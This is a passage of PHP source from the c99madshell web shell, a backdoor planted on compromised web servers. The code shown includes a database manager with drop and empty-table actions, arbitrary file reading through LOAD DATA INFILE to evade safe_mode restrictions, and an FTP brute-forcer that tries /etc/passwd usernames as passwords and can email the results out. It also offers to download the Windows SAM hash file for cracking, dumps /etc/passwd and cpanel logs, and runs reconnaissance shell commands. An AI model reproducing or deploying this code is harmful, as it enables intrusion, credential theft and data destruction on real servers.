value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; foreach ($tbl_struct_fields as $field) { $name = $field["Field"]; if (empty($sql_tbl_insert_q)) {$v = "";} echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; $i++; } echo "</table><br>"; echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; } } if ($sql_tbl_act == "browse") { $sql_tbl_ls = abs($sql_tbl_ls); $sql_tbl_le = abs($sql_tbl_le); echo "<hr size=\"1\" noshade>"; $b = 0; for($i=0;$i<$numpages;$i++) { if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.thistbl.value='1';document.sql.sql_order.value='".htmlspecialchars($sql_order)."';document.sql.sql_tbl_ls.value='".($i*$perpage)."';document.sql.sql_tbl_le.value='".($i*$perpage+$perpage)."';document.sql.submit();\"><u>";} echo $i; if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} else {echo " ";} } if ($i == 0) {echo "empty";} echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>"; echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; echo "<tr>"; echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; for ($i=0;$i<mysql_num_fields($result);$i++) { $v = mysql_field_name($result,$i); if ($e[0] == "a") {$s = "d"; $m = "asc";} else {$s = "a"; $m = "desc";} echo "<td>"; if (empty($e[0])) {$e[0] = "a";} if ($e[1] != $v) {$sql_order="";$sql_order=$e[0]." ".$v;echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$sql_order."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>".$v."</b></a>";} else {echo "<b>".$v."</b> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$s."%20".$v."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><font color=red>\/</font></a>";} echo "</td>"; } echo "<td><font color=\"green\"><b>Action</b></font></td>"; echo "</tr>"; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { echo "<tr>"; $w = ""; $i = 0; foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; $i = 0; foreach ($row as $k=>$v) { $v = htmlspecialchars($v); if ($v == "") {$v = "<font color=\"green\">NULL</font>";} echo "<td>".$v."</td>"; $i++; } echo "<td>"; echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>DEL</b></a> "; echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl_act.value='insert';document.sql.sql_tbl_insert_q.value='".urlencode($w)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>EDIT</b></a> "; echo "</td>"; echo "</tr>"; } mysql_free_result($result); echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">"; echo "<option value=\"\">With selected:</option>"; echo "<option value=\"deleterow\">Delete</option>"; echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; } } else { $result = mysql_query("SHOW TABLE STATUS", $sql_sock); if (!$result) {echo mysql_smarterror();} else { echo "<br><form method=\"POST\"><input name='act' type='hidden' value='sql'><input name='sql_login' type='hidden' value='".$sql_login."'><input name='sql_server' type='hidden' value='".$sql_server."'><input name='sql_port' type='hidden' value='".$sql_port."'><input name='sql_db' type='hidden' value='".$sql_db."'><input name='sql_passwd' type='hidden' value='".$sql_passwd."'><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; $i = 0; $tsize = $trows = 0; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $tsize += $row["Data_length"]; $trows += $row["Rows"]; $size = view_size($row["Data_length"]); echo "<tr>"; echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; echo "<td> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($row["Name"])."';document.sql.submit();\"><b>".$row["Name"]."</b></a> </td>"; echo "<td>".$row["Rows"]."</td>"; echo "<td>".$row["Type"]."</td>"; echo "<td>".$row["Create_time"]."</td>"; echo "<td>".$row["Update_time"]."</td>"; echo "<td>".$size."</td>"; echo "<td> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>EMPT</b></a> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DROP TABLE `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>DROP</b></a> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_tbl.value='".$row["Name"]."';document.sql.sql_tbl_act.value='insert';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>INS</b></a> </td>"; echo "</tr>"; $i++; } echo "<tr bgcolor=\"000000\">"; echo "<td><center><b>»</b></center></td>"; echo "<td><center><b>".$i." table(s)</b></center></td>"; echo "<td><b>".$trows."</b></td>"; echo "<td>".$row[1]."</td>"; echo "<td>".$row[10]."</td>"; echo "<td>".$row[11]."</td>"; echo "<td><b>".view_size($tsize)."</b></td>"; echo "<td></td>"; echo "</tr>"; echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">"; echo "<option value=\"\">With selected:</option>"; echo "<option value=\"tbldrop\">Drop</option>"; echo "<option value=\"tblempty\">Empty</option>"; echo "<option value=\"tbldump\">Dump</option>"; echo "<option value=\"tblcheck\">Check table</option>"; echo "<option value=\"tbloptimize\">Optimize table</option>"; echo "<option value=\"tblrepair\">Repair table</option>"; echo "<option value=\"tblanalyze\">Analyze table</option>"; echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; mysql_free_result($result); } } } } } else { $acts = array("","newdb","serverstatus","servervars","processes","getfile"); if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } if (!empty($sql_act)) { echo "<hr size=\"1\" noshade>"; if ($sql_act == "newdb") { echo "<b>"; if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} } if ($sql_act == "serverstatus") { $result = mysql_query("SHOW STATUS", $sql_sock); echo "<center><b>Server-status variables:</b><br><br>"; echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} echo "</table></center>"; mysql_free_result($result); } if ($sql_act == "servervars") { $result = mysql_query("SHOW VARIABLES", $sql_sock); echo "<center><b>Server variables:</b><br><br>"; echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} echo "</table>"; mysql_free_result($result); } if ($sql_act == "processes") { if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} $result = mysql_query("SHOW PROCESSLIST", $sql_sock); echo "<center><b>Processes:</b><br><br>"; echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.kill.value='".$row[0]."';document.sql.submit();\"><u>Kill</u></a></td></tr>";} echo "</table>"; mysql_free_result($result); } if ($sql_act == "getfile") { $tmpdb = $sql_login."_tmpdb"; $select = mysql_select_db($tmpdb); if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} if ($select) { $created = FALSE; mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $result = mysql_query("SELECT * FROM tmp_file;"); if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} else { for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} $f = ""; while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} mysql_free_result($result); mysql_query("DROP TABLE tmp_file;"); } } mysql_drop_db($tmpdb); //comment it if you want to leave database } } } } echo "</td></tr></table>"; if ($sql_sock) { $affected = @mysql_affected_rows($sql_sock); if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; } echo "</table>"; } if ($act == "mkdir") { if ($mkdir != $d) { if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} echo "<br><br>"; } $act = $dspact = "ls"; } if ($act == "ftpquickbrute") { echo "<b>Ftp Quick brute:</b><br>"; if (!win) {echo "This functions not work in Windows!<br><br>";} else { function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} else {$TRUE = TRUE;} if ($TRUE) { $sock = @ftp_connect($host,$port,$timeout); if (@ftp_login($sock,$login,$pass)) { echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; ob_flush(); return TRUE; } } } if (!empty($submit)) { if (isset($_POST['fqb_lenght'])) $fqb_lenght = $_POST['fqb_lenght']; if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { if (isset($_POST['fqb_logging'])) $fqb_logging = $_POST['fqb_logging']; if ($fqb_logging) { if (isset($_POST['fqb_logfile'])) $fqb_logging = $_POST['fqb_logfile']; if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} else {$fqb_logfp = FALSE;} $fqb_log = "FTP Quick Brute (called c99madshell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} } ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} $success++; ob_flush(); } if ($i > $fqb_lenght) {break;} $i++; } if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} fclose($fqb_logfp); } } else { $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); echo "<form method=\"POST\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell? <input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging? <input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file? <input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail? <input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; } } } if ($act == "d") { if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} else { echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; if (!$win) { echo "<tr><td><b>Owner/Group</b></td><td> "; $ow = posix_getpwuid(fileowner($d)); $gr = posix_getgrgid(filegroup($d)); $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); } echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; } } if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} if ($act == "security") { echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} echo "<b>*nix /etc/passwd:</b><br>"; if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} echo "<form method=\"POST\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\"> <input type=submit value=\"View\"></form><br>"; $i = $nixpwd_s; while ($i < $nixpwd_e) { $uid = posix_getpwuid($i); if ($uid) { $uid["dir"] = "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($uid["dir"])."';document.todo.submit();\">".$uid["dir"]."</a>"; echo join(":",$uid)."<br>"; } $i++; } } else {echo "<br><a href=\"#\" onclick=\"document.todo.act.value='security';document.todo.d.value='".$ud."';document.todo.nixpasswd.value='1';document.todo.submit();\"><b><u>Get /etc/passwd</u></b></a><br>";} } else { $v = $_SERVER["WINDIR"]."\repair\sam"; if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='sam';document.todo.d.value='".$_SERVER["WINDIR"]."\/repair';document.todo.ft.value='download';document.todo.submit();\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} } if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='userdomains';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='accounting.log';document.todo.d.value='".urlencode("/var/cpanel/")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>View cpanel logs</b></u></a></font></b><br>";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/usr/local/apache/conf")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='httpd.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='syslog.conf';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='motd';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Message Of The Day</b></u></a></font></b><br>";} if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"#\" onclick=\"document.todo.act.value='f';document.todo.f.value='hosts';document.todo.d.value='".urlencode("/etc")."';document.todo.ft.value='txt';document.todo.submit();\"><u><b>Hosts</b></u></a></font></b><br>";} function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} displaysecinfo("OS Version?",myshellexec("cat /proc/version")); displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); displaysecinfo("RAM",myshellexec("free -m")); displaysecinfo("HDD space",myshellexec("df -h")); displaysecinfo("List of Attributes",myshellexec("lsattr -a")); displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); displaysecinfo("Is cURL installed?",myshellexec("which curl")); displaysecinfo("Is lynx installed?",myshellexec("which lynx")); displaysecinfo("Is links installed?",myshellexec("which links")); displaysecinfo("Is fetch installed?",myshellexec("which fetch")); displaysecinfo("Is GET installed?",myshellexec("which GET")); displaysecinfo("Is perl installed?",myshellexec("which perl")); displaysecinfo("Where is apache",myshellexec("whereis apache")); displaysecinfo("Where is perl?",myshellexec("whereis perl")); displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); displaysecinfo("locate my.conf",myshellexec("locate my.conf")); displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); } if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} } else {$act = $dspact = "ls";} } if ($act == "fsbuff") { $arr_copy = $sess_data["copy"]; $arr_cut = $sess_data["cut"]; $arr = array_merge($arr_copy,$arr_cut); if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} } if ($act == "selfremove") { if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); } else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} } else { if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} $rnd = rand(0,9).rand(0,9).rand(0,9); echo "<form method=\"POST\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>"; } } if ($act == "search") { echo "<b>Search in file-system:</b><br>"; if (empty($search_in)) {$search_in = $d;} if 